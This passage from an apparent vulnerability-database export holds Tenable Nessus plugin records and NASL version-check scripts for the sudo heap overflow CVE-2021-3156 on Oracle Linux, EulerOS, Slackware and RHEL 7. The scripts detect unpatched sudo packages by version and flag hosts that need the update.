the\nELSA-2021-0221 advisory.\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via sudoedit\n -s and a command-line argument that ends with a single backslash character: (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-0221.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel 
packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\npkgs = [\n {'reference':'sudo-1.8.23-10.el7_9.1', 'cpu':'x86_64', 'release':'7'},\n {'reference':'sudo-devel-1.8.23-10.el7_9.1', 'cpu':'i686', 'release':'7'},\n {'reference':'sudo-devel-1.8.23-10.el7_9.1', 'cpu':'x86_64', 'release':'7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if 
(!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-23T01:08:53", "description": "According to the version of the sudo package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow,\n allowing privilege escalation to root via 'sudoedit -s'\n and a command-line argument that ends with a single\n backslash character.(CVE-2021-3156)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 1, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-22T00:00:00", "title": "EulerOS 2.0 SP2 : sudo (EulerOS-SA-2021-1366)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-22T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:sudo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1366.NASL", "href": "https://www.tenable.com/plugins/nessus/146716", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146716);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/22\");\n\n script_cve_id(\n \"CVE-2021-3156\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : sudo (EulerOS-SA-2021-1366)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the sudo package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow,\n allowing privilege escalation to root via 'sudoedit -s'\n and a command-line argument that ends with a single\n backslash character.(CVE-2021-3156)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1366\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4587a5e0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"sudo-1.8.6p7-23.h9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T09:14:11", "description": "New sudo packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "edition": 6, 
"cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : sudo (SSA:2021-026-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:sudo", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2021-026-01.NASL", "href": "https://www.tenable.com/plugins/nessus/145472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2021-026-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145472);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"SSA\", value:\"2021-026-01\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : sudo (SSA:2021-026-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"New sudo packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.461226\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1844bbb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 
extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0222 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "RHEL 7 : sudo (RHSA-2021:0222)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:7.7::computenode", "cpe:/o:redhat:rhel_e4s:7.7::server", "cpe:/o:redhat:rhel_tus:7.7::computenode", "cpe:/o:redhat:rhel_eus:7.7::computenode", "cpe:/o:redhat:rhel_tus:7.7", "cpe:/o:redhat:rhel_aus:7.7", "cpe:/o:redhat:rhel_aus:7.7::computenode", "cpe:/o:redhat:rhel_eus:7.7::server", "cpe:/o:redhat:rhel_e4s:7.7", "p-cpe:/a:redhat:enterprise_linux:sudo-devel", "cpe:/o:redhat:rhel_eus:7.7", "cpe:/o:redhat:rhel_aus:7.7::server", "p-cpe:/a:redhat:enterprise_linux:sudo", "cpe:/o:redhat:rhel_tus:7.7::server"], "id": "REDHAT-RHSA-2021-0222.NASL", "href": "https://www.tenable.com/plugins/nessus/145498", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0222. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145498);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0222\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 7 : sudo (RHSA-2021:0222)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0222 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", 
value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '7.7')) audit(AUDIT_OS_NOT, 'Red Hat 7.7', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_7_7_server': [\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-e4s-debug-rpms',\n 'rhel-7-server-e4s-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-e4s-rpms',\n 'rhel-7-server-e4s-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-e4s-source-rpms',\n 'rhel-7-server-e4s-source-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-source-rpms'\n ],\n 'rhel_eus_7_7_computenode': [\n 'rhel-7-hpc-node-eus-debug-rpms',\n 
'rhel-7-hpc-node-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-optional-debug-rpms',\n 'rhel-7-hpc-node-eus-optional-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-optional-rpms',\n 'rhel-7-hpc-node-eus-optional-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-optional-source-rpms',\n 'rhel-7-hpc-node-eus-optional-source-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-rpms',\n 'rhel-7-hpc-node-eus-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-source-rpms',\n 'rhel-7-hpc-node-eus-source-rpms__7_DOT_7__x86_64'\n ],\n 'rhel_eus_7_7_server': [\n 'rhel-7-for-system-z-eus-debug-rpms',\n 'rhel-7-for-system-z-eus-debug-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-optional-debug-rpms',\n 'rhel-7-for-system-z-eus-optional-debug-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-optional-rpms',\n 'rhel-7-for-system-z-eus-optional-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-optional-source-rpms',\n 'rhel-7-for-system-z-eus-optional-source-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-rpms',\n 'rhel-7-for-system-z-eus-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-source-rpms',\n 'rhel-7-for-system-z-eus-source-rpms__7_DOT_7__s390x',\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-optional-debug-rpms',\n 'rhel-7-server-aus-optional-rpms',\n 'rhel-7-server-aus-optional-source-rpms',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-e4s-debug-rpms',\n 'rhel-7-server-e4s-optional-debug-rpms',\n 'rhel-7-server-e4s-optional-rpms',\n 'rhel-7-server-e4s-optional-source-rpms',\n 'rhel-7-server-e4s-rpms',\n 'rhel-7-server-e4s-source-rpms',\n 'rhel-7-server-eus-debug-rpms',\n 'rhel-7-server-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-optional-debug-rpms',\n 'rhel-7-server-eus-optional-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-optional-rpms',\n 'rhel-7-server-eus-optional-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-optional-source-rpms',\n 'rhel-7-server-eus-optional-source-rpms__7_DOT_7__x86_64',\n 
